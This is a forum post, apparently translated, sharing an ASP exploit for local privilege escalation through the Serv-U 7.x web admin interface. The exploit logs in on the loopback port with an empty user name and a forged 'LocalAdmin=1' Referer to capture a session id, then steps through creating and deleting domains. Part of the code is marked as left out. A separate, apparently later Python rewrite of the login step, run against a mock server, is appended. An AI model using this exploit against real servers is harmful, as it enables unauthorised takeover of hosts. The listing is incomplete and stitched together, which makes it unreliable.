私奔 posted on 2010-2-2 14:13:22

Local privilege escalation: ASP version with Serv-U 7.x support

The approach follows 空虚浪子心's privilege escalation method. Since ASP cannot work with sockets, the only option is to create a new domain and then delete it. The program's interface is copied from 陆大's Serv-U 6.x echo program, heh. Since I'm a noob, I couldn't figure out how the userid changes in Serv-U 7.0, so only the domain gets deleted...
I found out why Serv-U 7.4 wouldn't connect: versions 7.0 and above start a newly added domain only after a delay. The original exp works fine. For everyone's convenience I added one line to it and am posting it again.


EXP:

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
' httpopen: send one HTTP request through Microsoft.XMLHTTP (the only HTTP
' client available to ASP, since raw sockets are not) and return the body as
' a string. neirong = request body, fangshi = method, dizhi = URL,
' refer = Referer header, cookie = Cookie header (sent only when non-empty).
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

' getmidstr: return the part of str between the first occurrence of L and the
' first occurrence of R (used to pull <sessionid> and similar values out of
' Serv-U's replies). Note that on a miss it returns a message, not "".
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="The string does not contain '"&L&"' or '"&R&"'"
End If
end Function

' bytes2BSTR: convert the raw responseBody byte array to a VBScript string.
' Bytes below &H80 are plain ASCII; anything else is treated as the lead byte
' of a double-byte (GBK) character so Chinese text in the replies survives.
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
'----------custom parameters start-----------

action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
OrganizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")

'----------custom parameters end-----------

' Each step of the attack is one action value; the page redirects from one
' step to the next, carrying the session id and management port in the query string.
select case action

case 1
' Log in to the Serv-U web admin on 127.0.0.1:port with an empty user name and
' LocalAdmin=1 in the Referer, then pull the <sessionid> out of the reply.
returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","http://127.0.0.1:"&port&"/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543","http://127.0.0.1:"&port&"/?Session=39893&Language=zh,CN&LocalAdmin=1","")
' getmidstr() returns a message rather than "" when the tags are missing, so
' test for the tag itself instead of for an empty result.
if instr(returns,"<sessionid>")>0 then
sessionid=getmidstr("<sessionid>","</sessionid>",returns)
Response.Write "login ok!"&"<br>"
Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
Response.Write "error!"&"<br>"
end if

case 2
' main2() is defined in the part of the exploit not reproduced in this listing.
call main2()

case 3
' Fetch the server user list with the session id as the Cookie and cut the
' organization id out of the OrganizationUsers.xml&ID=... link.
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1","",sessionid)
OrganizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
OrganizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
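An added example, not code from the original post and not Serv-U's own: the login step of the exploit above (action=1) rewritten in Python against a constructed in-process mock of the Serv-U web admin so it runs offline, plus the wait that the 7.4 note calls for. Only the request shape is taken from the ASP code (the Login.xml URL, the empty user, the LocalAdmin=1 Referer, the Serv-U User-Agent, the <sessionid> tag). The mock's rule for granting a session, the session id 39893 it hands back and the FTP banner are all constructed here and say nothing about how a real Serv-U checks the request. wait_for_ftp replaces a fixed sleep with polling: it retries the new domain's FTP port until a 220 banner arrives or a deadline passes, which is the delayed domain start the author hit on 7.4.

```python
import re
import socket
import threading
import time
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Request shape copied from the post's ASP exploit (action=1).
LOGIN_PATH = "/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543"
# Constructed session id the mock below hands back; not real Serv-U output.
MOCK_SESSIONID = "39893"


def _post(url, body, headers):
    """POST like the ASP httpopen(); any HTTP or socket error yields an empty body."""
    req = urllib.request.Request(url, data=body.encode(), headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.read().decode("utf-8", "replace")
    except OSError:  # HTTPError and URLError are both OSError subclasses
        return ""


def login(port, loginpass="", local_admin=True):
    """action=1: empty user on the loopback admin port; returns <sessionid> or None."""
    base = f"http://127.0.0.1:{port}"
    referer = f"{base}/?Session=39893&Language=zh,CN" + ("&LocalAdmin=1" if local_admin else "")
    headers = {"Referer": referer, "Content-Type": "application/x-www-form-urlencoded",
               "User-Agent": "Serv-U",
               "x-user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"}
    text = _post(base + LOGIN_PATH, f"user=&pword={loginpass}&language=zh%2CCN%26", headers)
    m = re.search(r"<sessionid>(.*?)</sessionid>", text)
    return m.group(1) if m else None  # unlike getmidstr(), a miss is None, not a message


def wait_for_ftp(port, timeout=5.0, interval=0.2):
    """The 7.4 lesson: poll the new domain's FTP port until a 220 banner arrives; None on timeout."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            with socket.create_connection(("127.0.0.1", port), timeout=1.0) as s:
                banner = s.recv(256).decode(errors="replace").strip()
                if banner.startswith("220"):
                    return banner
        except OSError:
            pass  # refused or no banner yet: the domain is still starting
        time.sleep(interval)
    return None


class MockServU(BaseHTTPRequestHandler):
    """Constructed stand-in for the web admin: it grants a session only to a loopback request
    with LocalAdmin=1 in the Referer and an empty user (the mock's rule, not Serv-U's real check)."""
    def log_message(self, *args):
        pass

    def _reply(self, code, text):
        self.send_response(code)
        self.send_header("Content-Length", str(len(text.encode())))
        self.end_headers()
        self.wfile.write(text.encode())

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        if (self.path == LOGIN_PATH and self.client_address[0] == "127.0.0.1"
                and "LocalAdmin=1" in self.headers.get("Referer", "") and body.startswith("user=&pword=")):
            self._reply(200, f"<sessionid>{MOCK_SESSIONID}</sessionid>")
        else:
            self._reply(403, "denied")


def start_delayed_ftp(delay):
    """Constructed FTP listener that binds only after `delay` seconds, like a domain still starting."""
    with socket.socket() as probe:
        probe.bind(("127.0.0.1", 0))
        port = probe.getsockname()[1]

    def serve():
        time.sleep(delay)
        with socket.create_server(("127.0.0.1", port)) as srv:
            conn, _ = srv.accept()
            with conn:
                conn.sendall(b"220 Serv-U FTP Server ready\r\n")  # constructed banner
    threading.Thread(target=serve, daemon=True).start()
    return port


def run_demo():
    """Log in (with and without the LocalAdmin flag) against the mock admin, then wait for the FTP port."""
    srv = HTTPServer(("127.0.0.1", 0), MockServU)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    port = srv.server_address[1]
    try:
        results = {"sessionid": login(port), "without_flag": login(port, local_admin=False)}
    finally:
        srv.shutdown()
        srv.server_close()
    results["banner"] = wait_for_ftp(start_delayed_ftp(0.6))
    return results
```

run_demo() returns the session id from the flagged login, None for the unflagged one, and the banner once the delayed listener comes up; on a real box the same wait_for_ftp loop would sit between creating the domain and the first FTP connection, in place of a fixed sleep.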